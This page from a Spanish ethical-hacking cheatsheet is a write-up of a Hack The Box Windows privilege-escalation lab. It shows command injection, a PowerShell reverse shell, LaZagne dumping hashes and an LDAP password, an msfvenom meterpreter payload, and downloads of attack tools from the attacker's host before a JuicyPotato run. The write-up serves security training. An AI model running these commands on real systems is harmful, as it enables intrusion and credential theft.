Cheatsheet
  • Introducción
    • 👾Ethical Hacking Cheatsheet
      • 📕Metodología OSSTMM
      • 📘MITRE ATT&CK
      • 🔢Proceso de Pentesting
      • 💻Instalación del entorno
        • 💻Instalación de VMWare
        • 💻Virtualizar Kali Linux
        • 🎨Personalización del entorno
        • 🕷️Máquinas Vulnerables
          • 💣Metasploitable 3
          • 🖖VPLE
          • 🟦Windows 11 Developer
      • 📔Organización y Notas
      • 👜Documentación e informes
        • 👜Documentos iniciales
        • 👜Toma de notas y organización
        • 👜Herramientas de documentación
        • 👜Tipos de informes
        • 👜Componentes de un informe
        • 👜Cómo redactar un hallazgo
        • 👜Consejos y trucos en la realización de informes
        • 👜Caso práctico: Informes
        • 👜CPTS Report
  • Sistemas básicos
    • 🐧Linux
    • 🪟Windows
    • 🔓Puertos y comprobaciones
    • Modos de Red
  • Recopilación de información
    • 🌐Google Hacking
      • 🌐Google Dorks
    • 💻Enumeración
      • 💻Metodología
      • 💻FTP
      • 💻SMB
      • 💻NFS
      • 💻DNS
      • 💻SMTP
      • 💻IMAP/POP3
      • 💻SNMP
      • 💻MySQL
      • 💻MSSQL
      • 💻Oracle TNS
      • 💻IPMI
      • 💻Protocolos de Administración Remota - Linux
      • 💻Protocolos de Administración Remota - Windows
      • 💻Footprinting Lab - Easy
      • 💻Footprinting Lab - Medium
      • 💻Footprinting Lab - Hard
    • 🔎Recopilación de información
      • 🔎Recopilación Pasiva
        • 🔎Subdominios - Pasiva
        • 🔎Identificar Tecnologías
        • 🔎Infraestructura - Pasiva
        • 🔎Fingerprinting
        • 🦭FOCA
      • 💻Recopilación Activa
        • 💻Reconocimiento automatizado
        • 💻Nmap
        • 💻Nmap Scripting Engine
        • 💻Subdominios - Activa
        • 💻Infraestructura - Activa
        • 💻Virtual Hosts
        • 💻Evasión de IDS
        • 💻Escaneo Avanzado
        • 💻Lab - Recopilación
      • 🧠OSINT
        • 🧠Herramientas Genéricas
        • 🧠OSINT a Usernames
        • 🧠OSINT a Teléfonos
        • 🧠OSINT a Emails
        • 🧠OSINT a Dominios
        • 🧠OSINT en Linkedin
        • 🧠OSINT en Instagram
    • 🕸️Fuzzing
      • 🕸️Gobuster
      • 🕸️Ffuf
      • 🕸️Dirsearch
    • 🕸️Crawling
      • 🕸️Web Crawlers
      • 🕸️Herramientas de Crawling
    • ☁️Hacking en CMS
    • 🍏Hacking en MacOS
  • Análisis de vulnerabilidades
    • 👾Análisis de vulnerabilidades
    • 👽Herramientas de Análisis
      • ⚙️Nmap: Análisis
      • ⚙️Nuclei
      • ⚙️OpenVAS
      • ⚙️Nessus
  • Explotación de vulnerabilidades
    • 💣Explotación en Hosts
      • 🔥Acceso básico
      • 🐚Shells y Payloads
        • 🐚Bind Shells
        • 🐚Reverse Shells
        • 🐚Payloads
        • 💣Metasploit Payloads
        • 🐚Tratamiento de la TTY
        • 🐚Webshells
          • 🐚Laudanum
          • 🐚PHP Webshell
        • 💣Lab de explotación
      • 🔎Buscador de exploits
      • 🔑Password Attacks
        • 🔑Cracking de Contraseñas
        • 🔑Bruteforce de Servicios
        • 🔑Login Bruteforce
          • 🔑Ataques de fuerza bruta
          • 🔑Ataques de diccionario
          • 🔑Ataques Híbridos
          • 🔑Bruteforce con Hydra
          • 🔑Autenticación HTTP básica
          • 🔑Formularios de Login
          • 🔑Medusa
        • 🔑Password Mutations
        • 🔑Contraseñas por defecto
        • 🔑Windows Attacks
          • 🔑Atacando a SAM
          • 🔑Atacando a LSASS
          • 🔑Atacando Active Directory
          • 🔑Credential Hunting - Windows
        • 🔑Linux Attacks
          • 🔑Credential Hunting - Linux
          • 🔑Passwd, Shadow y Opasswd
        • 🔑Archivos Protegidos
        • 🔑Archivos Comprimidos
        • 🔑Políticas de Contraseñas
        • 🔑Administradores de Contraseñas
        • 🔑Labs de contraseñas
          • 🔑Lab de contraseñas - Easy
          • 🔑Lab de contraseñas - Medium
          • 🔑Lab de contraseñas - Hard
      • 👾Atacando Servicios Comunes
        • 👾Ataques a FTP
        • 👾Ataques a SMB
        • 👾Ataques a Bases de Datos
        • 👾Ataques a RDP
        • 👾Ataques a DNS
        • 👾Ataques a Emails
        • 👾Labs - Common Services
          • 👾Lab - Easy
          • 👾Lab - Medium
          • 👾Lab - Hard
      • 🔁Pivoting, Tunelling y Port Forwarding
        • 🔁Redes en Pivoting
        • 🔁Port Forwarding
        • 🔁Remote/Reverse Port Forwarding con SSH
        • 🔁Meterpreter Tunneling & Port Forwarding
        • 🔁Pivoting con Socat
        • 🔁SSH para Windows: plink.exe
        • 🔁Pivoting SSH con Sshuttle
        • 🔁Web Server Pivoting con Rpivot
        • 🔁Port Forwarding con Windows Netsh
        • 🔁Túnel DNS con Dnscat2
        • 🔁SOCKS5 Tunneling con Chisel
        • 🔁ICMP Tunneling con SOCKS
        • 🔁RDP y SOCKS Tunneling con SocksOverRDP
        • 🔁Pivoting: Skills Assessment
        • 🔁Port Forwarding dinámico
      • 🧨Metasploit
        • 🧨Metasploit - Atacando Windows
      • ☠️Msfvenom
      • 🐍Hydra
      • ❌BruteX
      • 🔄File Transfers
      • 💿Buffer Overflow en Linux
    • 💣Explotación en Web
      • ⬆️Ataques de subida de archivos
        • ⬆️Ausencia de validación
        • ⬆️Explotación de subida
        • ⬆️Client-Side Validation
        • ⬆️Filtros de Blacklist
        • ⬆️Filtros de Whitelist
        • ⬆️Filtros de tipo
        • ⬆️Cargas de archivos limitadas
        • ⬆️Otros ataques de carga
        • ⬆️Prevención en carga de archivos
        • ⬆️File Uploads - Skills Assessment
      • 🕸️Ataques Web Modernos
        • 🕸️HTTP Verb Tampering
          • 🕸️Bypass de autenticación
          • 🕸️Bypass de Filtros
          • 🕸️Prevención de HTML Verb Tampering
        • 🕸️IDOR
          • 🕸️Identificación de IDOR
          • 🕸️Enumeración de IDOR
          • 🕸️Bypass de referencias codificadas
          • 🕸️IDOR en APIs Inseguras
          • 🕸️Encadenar vulnerabilidades IDOR
          • 🕸️Prevención de IDOR
        • 🕸️XML External Entity (XXE)
          • 🕸️Local File Disclosure
          • 🕸️Advanced File Disclosure
          • 🕸️Blind Data Exfiltration
          • 🕸️Prevención de XXE
        • 🕸️Ataques Web - Skills Assesment
      • 💣Ataques a Aplicaciones Web
        • 🔎Descubrimiento y enumeración de aplicaciones
        • 💣Ataques a CMS
          • 🔎Wordpress - Enumeración
          • 💣Wordpress - Ataques
          • 🔎Joomla - Enumeración
          • 💣Joomla - Ataques
          • 🔎Drupal - Enumeración
          • 💣Drupal - Ataques
        • 💣Ataques a Servlet Containers
          • 🔎Tomcat - Enumeración
          • 💣Tomcat - Ataques
          • 🔎Jenkins - Enumeración
          • 💣Jenkins - Ataques
        • 💣Ataques a herramientas de monitorización
          • 🔎Splunk - Enumeración
          • 💣Splunk - Ataques
          • 💣PTRG Network Monitor
        • 💣Ataques a aplicaciones varias
          • 💣osTicket
          • 🔎GitLab - Enumeración
          • 💣GitLab - Ataques
          • 💣Tomcat CGI
          • 💣Ataques a CGI - Shellshock
          • 💣Ataques a Aplicaciones de Cliente Pesado
          • 💣Vulnerabilidades Web en Aplicaciones de Cliente Pesado
          • 🔎ColdFusion - Enumeración
          • 💣Coldfusion - Ataques
          • 🔎IIS Tilde - Enumeración
          • 💣Asignación masiva de archivos web
          • 💣Ataques a aplicaciones que se conectan a servicios
          • 💣Otras aplicaciones notables
          • 🛡️Hardening de Aplicaciones
        • 💣Labs - Ataques a Aplicaciones
          • 💣Lab - Ataques a Aplicaciones I
          • 💣Lab - Ataques a Aplicaciones II
          • 💣Lab - Ataques a Aplicaciones III
      • 💉SQL Injection
        • 💉SQLMap
          • 💉Introducción a SQLMap
          • 💉SQLMap - HTTP Request
          • 💉SQLMap - Manejo de errores
          • 💉SQLMap - Ajuste del ataque
          • 💉SQLMap - Enumeración Básica
          • 💉SQLMap - Enumeración Avanzada
          • 💉SQLMap - Bypass de protección web
          • 💉SQLMap - Explotación de S.O.
          • 💉SQLMap - Skills Assessment
      • 💉Command Injection
        • 💉Detección
        • 💉Inyectando comandos
        • 💉Otros operadores de inyección
        • 💉Identificación de filtros
        • 💉Bypass de filtros de espacios
        • 💉Bypass de otros caracteres en Blacklist
        • 💉Bypass de comandos en Blacklist
        • 💉Ofuscación de comandos avanzada
        • 💉Herramientas de Ofuscación de comandos
        • 💉Prevención de Command Injection
        • 💉Command Injection - Skills Assesment
      • 📁Local File Inclusion
      • 💿Cross Site Scripting (XSS)
        • 💿XSS Stored
        • 💿XSS Reflected
        • 💿XSS DOM-Based
        • 💿XSS Discovery
        • 💿XSS Payloads
        • 💿Defacing con XSS
        • 💿Phising con XSS
        • 💿Session Hijacking
        • 💿Prevención de XSS
        • 💿XSS - Skills Assessment
      • 💻API Hacking
      • 🔻DDoS Attack
      • 💡Web Proxies
        • 💡Configuración
        • 💡Interceptando solicitudes
        • 💡Interceptar respuestas
        • 💡Modificación automática
        • 💡Solicitudes repetidas
        • 💡Encoding / Decoding
        • 💡Herramientas de Proxy
        • 💡Burp Intruder
        • 💡Zap Fuzzer
        • 💡Burp Scanner
        • 💡Zap Scanner
        • 💡Extensiones
        • 💡Proxy: Skills Assestment
      • 👨‍🍳Cyberchef
    • 💣Explotación en Redes
      • 😎Man in the middle
      • 🎣Phising
        • 🎣Herramientas de Phising
        • 🎣Seeker y Ngrok
        • 🎣Social Engineering Toolkit
        • 🎣Gophish
      • 🤼Ingeniería Social
      • 🔐Bruteforce a RRSS
      • 🌐Hacking WiFi
        • 🌐Conceptos básicos
        • 🌐Redes Básicas
        • 🌐Sniffing
        • 🌐Deauth
        • 🌐Redes ocultas
        • 🌐WEP Cracking
          • 🌐Ataque a WEP
          • 🌐Fake Autentication
          • 🌐Packet Injection
            • 🌐ARP Request Replay
            • 🌐Chop Chop
            • 🌐Fragmentation
          • 🌐Redes SKA
        • 🌐WPS Cracking
        • 🌐WPA/WPA2 Cracking
        • 🌐Wifite
        • 🌐Evil Portal
        • 🌐Rainbow Table
        • 🌐WPA/WPA2 Enterprise
    • 📕Diccionarios Custom
      • 📕Username Anarchy
      • 📕Cupp
      • 📕Crunch
      • 📕CeWL
      • 📕DyMerge
  • Post Explotación
    • 💻Post Explotación
      • 👾Meterpreter
      • 🐈Mimikatz
      • 🔐LaZagne
      • 📩Procdump y lsass.exe
      • ↔️Movimientos Laterales
        • ↔️Pass the Hash (PtH)
        • ↔️Pass the Ticket (PtT) - Windows
        • ↔️Pass the Ticket (PtT) - Linux
      • 🚪Backdoor en binarios
      • 🦅Covenant
      • ⚔️Koadic
      • 💾Bases de datos
        • 💾MySQL
        • 💾PostgreSQL
      • ⚙️P.E. Avanzada
      • 🧼Borrado de evidencias
    • 🌋Escalada de Privilegios
      • 🐧Escalada de privilegios en Linux
        • 🐧Enumeración del entorno
        • 🐧Enumeración de servicios y componentes internos
        • 🐧Búsqueda de credenciales en Linux
        • 🐧Abuso de PATH
        • 🐧Abuso de comodines
        • 🐧Shells restringidos
        • 🐧Permisos especiales
        • 🐧Abuso de permisos Sudo
        • 🐧Grupos privilegiados
        • 🐧Capabilities
        • 🐧Servicios vulnerables
        • 🐧Abuso de Cron
        • 🐧Contenedores
        • 🐧Docker
        • 🐧Kubernetes
        • 🐧Logrotate
        • 🐧Técnicas varias
        • 🐧Exploits del Kernel - Linux
        • 🐧Bibliotecas compartidas
        • 🐧Secuestro de objetos compartidos
        • 🐧Secuestro de librería de Python
        • 🐧Sudo Zeroday
        • 🐧Polkit Zeroday
        • 🐧Dirty Pipe
        • 🐧Netfilter
        • 🐧Hardening en Linux - Privesc
        • 🐧Escalada en Linux - Skills Assesment
        • ⬆️Linpeas
      • 📘Escalada de privilegios en Windows
        • 📘Herramientas útiles
        • 📘Conciencia situacional
        • 📘Enumeración inicial en Windows
        • 📘Enumeración inicial
        • 📘Comunicación con Procesos
        • 📘Privilegios de Usuario en Windows
          • 📘SeImpersonate y SeAssignPrimaryToken
          • 📘SeDebugPrivilege
          • 📘SeTakeOwnershipPrivilege
        • 📘Privilegios de Grupo en Windows
          • 📘Grupos Integrados en Windows
          • 📘Lectores de Registros de Eventos
          • 📘DnsAdmins
          • 📘Hyper-V Administrators
          • 📘Print Operators
          • 📘Server Operators
        • 📘Atacando el Sistema Operativo Windows
          • 📘User Account Control (UAC)
          • 📘Permisos débiles
          • 📘Exploits del Kernel - Windows
          • 📘Servicios vulnerables en Windows
          • 📘DLL Injection
        • 📘Robo de credenciales en Windows
          • 📘Búsqueda de credenciales en Windows
          • 📘Otros archivos interesantes en Windows
          • 📘Otros robos de credenciales en Windows
        • 📘Entornos restrictivos - Citrix
        • 📘Varias técnicas de escalada en Windows
          • 📘Interacción con usuarios
          • 📘Pillaging
          • 📘Técnicas varias
        • 📘Sistemas Operativos Obsoletos
          • 📘Sistemas operativos heredados
          • 📘Windows Server
          • 📘Windows Desktop
        • 📘Hardening en Windows
        • 📘Escalada de privilegios en Windows: Skills Assessment
          • 📘Escenario 1
          • 📘Escenario 2
      • 🔴GTFOBins
  • Evasión de defensas
    • 🛡️Detección y evasión de defensas
      • 🛡️Load Balancing Detector
      • 🛡️Evasión de WAFs
      • 🛡️Evasión de Antivirus
      • 🛡️Herramientas de Evasión
  • Active Directory
    • ☁️Active Directory
      • ☁️Enumeración en AD
        • ☁️AD: Enumeración inicial del dominio
        • ☁️AD: Enumeración de controles de seguridad
        • ☁️AD: Enumeración con credenciales: desde Linux
        • 👁️PowerView
        • ☁️AD: Enumeración con credenciales: desde Windows
        • ☁️AD: Enumeración nativa en Windows
      • ☄️Sniffing desde el Foothold
        • ☄️LLMNR/NBT-NS Poisoning - Desde Linux
        • ☄️LLMNR/NBT-NS Poisoning - Desde Windows
      • 🔫Password Spraying
        • 🔫AD: Políticas de contraseñas
        • 🔫AD: Crear lista de usuarios
        • 🔫Password Spraying Interno - Desde Linux
        • 🔫Password Spraying Interno - Desde Windows
      • 🐺Kerberos
        • ⚔️Hacking en Kerberos
        • ⚔️Kerberoasting desde Linux
        • ⚔️Kerberoasting desde Windows
        • 🗝️Acceso a Credenciales
        • 🗝️Volcado de LSASS y SAM
        • 🗝️Credenciales cacheadas
        • 🗝️Pass the Hash
        • 🪙Token Impersonation
        • 🎟️ASK-TGT
        • 🎫Golden y Silver Tickets
        • 🐺Kerberos "Double Hop"
      • 🦸‍♂️ACLs - Access Control Lists
        • 🦸‍♂️ACLs Vulnerables
        • 🦸‍♂️Enumeración de ACLs
        • 🦸‍♂️Tácticas de abuso de ACLs
      • 🔄DCSync
      • ⬆️Acceso Privilegiado
      • ❤️‍🩹Vulnerabilidades en AD
      • ⚙️Malas configuraciones en AD
      • 🤝Relaciones de confianza
        • 🤝Ataque de confianza de dominio - Desde Windows
        • 🤝Ataque de confianza de dominio - Desde Linux
        • 🤝Abuso de confianza entre bosques - Desde Windows
        • 🤝Abuso de confianza entre bosques - Desde Linux
      • ☁️Vulnerable AD
      • ⬇️SAM
      • 🔐LDAP
        • 🔐Atacando LDAP
      • 🔐NTDS
      • 🔐NTLM/SMB Relay
      • 🩸BloodHound
      • 🛡️Hardening en AD
      • 💻Técnicas adicionales de auditoría en AD
      • 💻AD - Skills Assessment I
      • 💻AD - Skills Assessment II
  • Hacking en entornos reales
    • 🏛️Enterprise Hacking
      • 🏛️Escenario y KickOff
      • 🏛️Enterprise Hacking Checklist
      • 🏛️Pruebas externas
        • 🏛️Recopilación de Información Externa
        • 🏛️Enumeración y explotación de servicios
        • 🏛️Enumeración y explotación web
        • 🏛️Acceso inicial
      • 🏛️Pruebas internas
        • 🏛️Persistencia Post-Explotación
        • 🏛️Recopilación de Información Interna
        • 🏛️Explotación y escalada de privilegios
      • 🏛️Movimiento lateral y escalada de privilegios
        • 🏛️Movimiento lateral
        • 🏛️Comprometiendo Active Directory
        • 🏛️Post Explotación en Active Directory
        • 🏛️Cierre del pentesting
    • ☁️AWS - Amazon Web Services
    • ⚔️Hacking en AWS
  • Anonimato y privacidad
    • 👹Anonimato y Privacidad
      • 🔒VPN
      • 🔒Proxy
      • 🔒Red TOR
      • 🔒Zero Knowledge Services
  • Machine Learning en Hacking
    • 🧠Machine Learning
      • 🧠Batea
      • 💀Pesidious
  • Hardware Hacking
    • 🐬Flipper Zero
      • 🐬Introducción
        • 🐬qFlipper
        • 🐬Instalar qFlipper en Kali Linux
        • 🐬Recuperación de Firmware
      • 📻Sub-GHz
        • 📻Lectura de señales
        • 📻Lectura de señales RAW
        • 📻Añadir nuevos controles remotos
        • 📻Frecuencias
      • ♒RFID de 125 kHz
        • ♒Lectura de tarjetas RFID
        • ♒Añadir tarjetas RFID manualmente
        • ♒Escritura de datos en tarjetas T5577
        • ♒Microchips para animales
      • 💳NFC
        • 💳Lectura de tarjetas NFC
        • 💳Extracción de claves con MFKey32
        • 💳Desbloqueo de tarjetas con contraseñas
        • 💳Escritura de datos en Magic Cards
        • 💳Añadir nuevas tarjetas NFC
      • 🔴Infrarrojos
        • 🔴Lectura de señales infrarrojas
        • 🔴Controles remotos universales
      • 👿Bad USB
        • 👿Script básico de Youtube
        • 👿Bruteforce de Pins
        • 👿RatLocker
      • 🎨Custom Firmwares
      • 🛜GPIO y Módulos
        • 🛜Marauder Firmware
        • 🛜Escaneo de Redes Wifi
        • 🛜Wifi Password Cracking
        • 🛜Evil Portal
      • 🔘iButton
        • 🔘Lectura de llaves iButton
        • 🔘Agregar llaves iButton manualmente
        • 🔘Escritura de datos en llaves iButton
  • Writeups
    • 🟢Hack the Box
      • 🟠Blurry
      • 🟠Hospital
      • 🟠Zipping
      • 🟢Analytics
      • 🟢Bizness
      • 🟢Boardlight
      • 🟢Broker
      • 🟢Chemistry
      • 🟢Codify
      • 🟢CozyHosting
      • 🟢Devvortex
      • 🟢GreenHorn
      • 🟢LinkVortex
      • 🟢PermX
    • 🐋Dockerlabs
      • 🟠Inclusion
      • 🟠Veneno
      • 🟢Hedgehog
      • 🟢Library
      • 🟢Move
      • 🟢Walking CMS
    • 🌩️TryHackMe
      • 🟠Attracktive Directory
    • 🌐Over The Wire
      • 🌐Bandit
      • 🌐Natas
Con tecnología de GitBook
En esta página
  • Pregunta 1
  • Escaneo de puertos
  • Command Inyection
  • Reverse Shell
  • Hotfixes disponibles
  • Pregunta 2
  • Enumeración de usuarios
  • LaZagne
  • Pregunta 3
  • Privilegios del usuario
  • Verificar versión de Windows
  • Transferencia de binarios a la máquina víctima
  • Meterpreter Webdelivery
  • Conseguir CLSIDs válidos
  • Acceso a la flag
  • Pregunta 4

¿Te fue útil?

  1. Post Explotación
  2. Escalada de Privilegios
  3. Escalada de privilegios en Windows
  4. Escalada de privilegios en Windows: Skills Assessment

Escenario 1

Durante una prueba de penetración contra la organización INLANEFREIGHT, se encuentra con un host Windows Server no perteneciente a un dominio que presenta una vulnerabilidad de Command Injection sin parchear. Tras establecerse, encuentra credenciales que podrían ser útiles para el movimiento lateral posterior en la evaluación y descubre otra vulnerabilidad que puede aprovecharse para escalar privilegios en el host objetivo.

Para esta evaluación, suponga que su cliente tiene un programa de gestión de parches/vulnerabilidades relativamente maduro pero no cuenta con suficiente personal y desconoce muchas de las mejores prácticas en torno a la gestión de configuración, lo que podría dejar a un host expuesto a una escalada de privilegios.

Enumere el host (comenzando con un escaneo de puertos con Nmap para identificar puertos/servicios accesibles), aproveche la falla de inyección de comandos para obtener acceso de reverse shell, escale privilegios a nivel NT AUTHORITY\SYSTEM o similar y responda las preguntas a continuación para completar esta parte de la evaluación.

Objetivo: 10.129.225.46

Pregunta 1

¿Qué dos KB están instalados en el sistema de destino? (Formato de respuesta: 3210000 y 3210060)

Escaneo de puertos

sudo nmap -v -sV -sCV -T5 -Pn 10.129.225.46

Nmap scan report for 10.129.225.46
Host is up (0.050s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: DEV Connection Tester
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: WINLPE-SKILLS1-
|   NetBIOS_Domain_Name: WINLPE-SKILLS1-
|   NetBIOS_Computer_Name: WINLPE-SKILLS1-
|   DNS_Domain_Name: WINLPE-SKILLS1-SRV
|   DNS_Computer_Name: WINLPE-SKILLS1-SRV
|   Product_Version: 10.0.14393
|_  System_Time: 2025-03-31T18:13:33+00:00
|_ssl-date: 2025-03-31T18:13:37+00:00; +1m10s from scanner time.
| ssl-cert: Subject: commonName=WINLPE-SKILLS1-SRV
| Issuer: commonName=WINLPE-SKILLS1-SRV
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-03-30T18:10:26
| Not valid after:  2025-09-29T18:10:26
| MD5:   3044:342f:397f:5c89:07e2:ca17:3f23:c675
|_SHA-1: 6caf:46ef:1f6c:6a3b:7849:f039:053e:4b55:2ce1:cb13
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Encontramos dos puertos abiertos en el objetivo:

Puerto
Estado
Servicio
Versión

80

Abierto

HTTP (IIS)

Microsoft IIS 10.0

3389

Abierto

RDP

Microsoft Terminal Services

📌 Importante

  • El puerto 80 aloja una aplicación web "DEV Connection Tester". Posible vector de ataque.

  • La información de RDP indica que el sistema es Windows 10.0.14393, lo que corresponde a Windows Server 2016.

Command Inyection

La web tiene un input básico y un CTA de "Ping Host". Al probar el payload básico 127.0.0.1/whoami y capturarlo con BurpSuite observamos que el mensaje de error "Ping request could not find host 127.0.0.1;whoami" indica que el parámetro addr se está ejecutando dentro de un comando ping, pero el separador ; no está funcionando para ejecutar comandos adicionales.

Después de probar varios payloads encuentro uno que funciona: 127.0.0.1 | whoami

Reverse Shell

Ahora que hemos identificado el Command Inyection vamos a conseguir una shell.

  • Payload utilizado: Windows, PowerShell#3 base64

Sustituímos whoami por el payload en el input y le damos enter:

127.0.0.1 | <payload>
afsh4ck@kali$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.179] from (UNKNOWN) [10.129.225.46] 49671
whoami
iis apppool\defaultapppool
PS C:\windows\system32\inetsrv> 

Hotfixes disponibles

Para responder a la pregunta 1, buscaremos los parches instalados en el sistema:

PS C:\windows\system32\inetsrv> Get-Hotfix | Select-Object HotFixID | Sort-Object HotFixID
Get-Hotfix | Select-Object HotFixID | Sort-Object HotFixID

HotFixID 
-------- 
KB3199986
KB3200970

Pregunta 2

Busque la contraseña de la cuenta ldapadmin en algún lugar del sistema.

En HTB esta pregunta debería ser la tercera, ya que necesitamos elevar privilegios para encontrarlo. Vamos a la pregunta 3 y después volvemos a esta.

Enumeración de usuarios

Vemos que el usuario ldapadmin no está presente en el sistema:

PS C:\Users\Administrator\Desktop> Get-WmiObject -Class Win32_UserAccount -Filter "LocalAccount='True'"

AccountType : 512
Caption     : WINLPE-SKILLS1-\Administrator
Domain      : WINLPE-SKILLS1-
SID         : S-1-5-21-2273790990-4155754617-1681432197-500
FullName    : 
Name        : Administrator

AccountType : 512
Caption     : WINLPE-SKILLS1-\DefaultAccount
Domain      : WINLPE-SKILLS1-
SID         : S-1-5-21-2273790990-4155754617-1681432197-503
FullName    : 
Name        : DefaultAccount

AccountType : 512
Caption     : WINLPE-SKILLS1-\Guest
Domain      : WINLPE-SKILLS1-
SID         : S-1-5-21-2273790990-4155754617-1681432197-501
FullName    : 
Name        : Guest

AccountType : 512
Caption     : WINLPE-SKILLS1-\htb-student
Domain      : WINLPE-SKILLS1-
SID         : S-1-5-21-2273790990-4155754617-1681432197-1001
FullName    : 
Name        : htb-student

AccountType : 512
Caption     : WINLPE-SKILLS1-\mrb3n
Domain      : WINLPE-SKILLS1-
SID         : S-1-5-21-2273790990-4155754617-1681432197-1000
FullName    : 
Name        : mrb3n

LaZagne

powershell -c "(New-Object System.Net.WebClient).DownloadFile('http://10.10.14.179/LaZagne.exe','C:\windows\Temp\LaZagne.exe')"
PS C:\Users\Administrator\Desktop> C:\windows\Temp\LaZagne.exe all
C:\windows\Temp\LaZagne.exe all

|====================================================================|
|                                                                    |
|                        The LaZagne Project                         |
|                                                                    |
|                          ! BANG BANG !                             |
|                                                                    |
|====================================================================|

[+] System masterkey decrypted for 1ef7b31a-39fd-4309-877e-c354d5a19506
[+] System masterkey decrypted for 644d306e-3a7a-434b-bd62-0b81ab91e5b6
[+] System masterkey decrypted for 6977da93-ec45-468e-8a19-97d9865fb2e6

########## User: SYSTEM ##########

------------------- Hashdump passwords -----------------

Administrator:500:aad3b435b51404eeaad3b435b51404ee:7796ee39fd3a9c3a1844556115ae1a54:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
mrb3n:1000:aad3b435b51404eeaad3b435b51404ee:7796ee39fd3a9c3a1844556115ae1a54:::
htb-student:1001:aad3b435b51404eeaad3b435b51404ee:3c0e5d303ec84884ad5c3b7876a06ea6:::

------------------- Lsa_secrets passwords -----------------

DPAPI_SYSTEM
0000   01 00 00 00 1D 35 B6 2C 53 EC 28 92 E8 6D D5 BE    .....5.,S.(..m..
0010   C7 4C 78 54 10 66 34 3A 70 3F 77 AF 3F 11 FA 7F    .LxT.f4:p?w.?...
0020   03 8D 79 6A CC 1A FF AC 7C 0E DD D3                ..yj....|...

NL$KM
0000   40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    @...............
0010   99 4F 5D 6C 55 B9 EC B5 0C 0B D8 75 A2 88 93 E4    .O]lU......u....
0020   C0 D9 EF C5 0D B9 40 57 92 39 9A BE 9D A5 83 ED    ......@W.9......
0030   11 CB 71 7C AB 32 CD 11 FD 7A ED 2E AB BE F1 62    ..q|.2...z.....b
0040   58 F2 1D 8A AC 9F AC FB 32 17 D8 EE B3 BD A5 DC    X.......2.......
0050   E2 D9 82 77 4A A3 16 D6 F3 B5 E0 28 13 72 C7 2E    ...wJ......(.r..


########## User: Administrator ##########

------------------- Apachedirectorystudio passwords -----------------

[+] Password found !!!
Host: dc01.inlanefreight.local
Port: 389
Login: ldapadmin
Password: car3ful_st0rinG_******
AuthenticationMethod: SIMPLE

Tenemos las creedenciales en plano de la cuenta ldapadmin y el hash del Administrador!

Pregunta 3

Escale privilegios y envíe el contenido del archivo flag.txt en el Escritorio del administrador.

Privilegios del usuario

PS C:\windows\system32\inetsrv> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

Tenemos el privilegio SeImpersonatePrivilege habilitado, lo que significa que podemos explotar un potato attack (JuicyPotato, RoguePotato, PrintSpoofer....) para elevar privilegios a NT AUTHORITY\SYSTEM.

Verificar versión de Windows

PS C:\windows\system32\inetsrv> systeminfo | findstr /B /C:"OS Name" /C:"OS Version"   
OS Name:                   Microsoft Windows Server 2016 Standard
OS Version:                10.0.14393 N/A Build 14393

El sistema es Windows Server 2016, por lo que usaremos JuicyPotato.

Descargamos JuicyPotato en Kali

Descargar la última release:

wget https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe

Crear Shell.exe malicioso con Msfvenom (opcional)

Si subimos este shell.exe y lo ejecutamos a través de Juicy Potato nos devolverá un Meterpreter como SYSTEM, con el que podemos establecernos mucho mejor en el sistema.

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.179 LPORT=443 -f exe -o shell.exe

Transferencia de binarios a la máquina víctima

Debemos colocarlos en un directorio con permisos de ejecución como C:\windows\Temp

JuicyPotatoNG
powershell -c "(New-Object System.Net.WebClient).DownloadFile('http://10.10.14.179/JuicyPotato.exe','C:\windows\Temp\JuicyPotato.exe')"
Binario de Netcat
powershell -c "(New-Object System.Net.WebClient).DownloadFile('http://10.10.14.179/nc.exe','C:\windows\Temp\nc.exe')"
shell..exe
powershell -c "(New-Object System.Net.WebClient).DownloadFile('http://10.10.14.179/shell.exe','C:\windows\Temp\shell.exe')"

Binarios en el objetivo

PS C:\windows\Temp> ls

    Directory: C:\windows\Temp


Mode                LastWriteTime         Length Name                          
----                -------------         ------ ----                                                      
-a----         4/1/2025   5:03 AM         153600 JuicyPotato.exe             
-a----         4/1/2025   5:08 AM          38616 nc.exe                        
-a----         4/1/2025   5:03 AM           7168 shell.exe    

Iniciar un listener multi handler en Kali

msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 10.10.14.179; set LPORT 443; exploit"

[*] Using configured payload generic/shell_reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 10.10.14.179
LPORT => 443
[*] Started reverse TCP handler on 10.10.14.179:443 

Ejecutar JuicyPotato

Al ejecutarlo veremos que nos da un error ya que necesitamos proporcionarle un CLSID válido:

PS C:\windows\system32\inetsrv> C:\windows\Temp\JuicyPotato.exe -l 1337 -p C:\windows\Temp\shell.exe -t *   

	JuicyPotatoNG
	by decoder_it & splinter_code

[*] Testing CLSID {854A20FB-2D44-457D-992F-EF13785D2B51} - COM server port 1337 
[-] The privileged process failed to communicate with our COM Server :( Try a different COM port in the -l flag. 

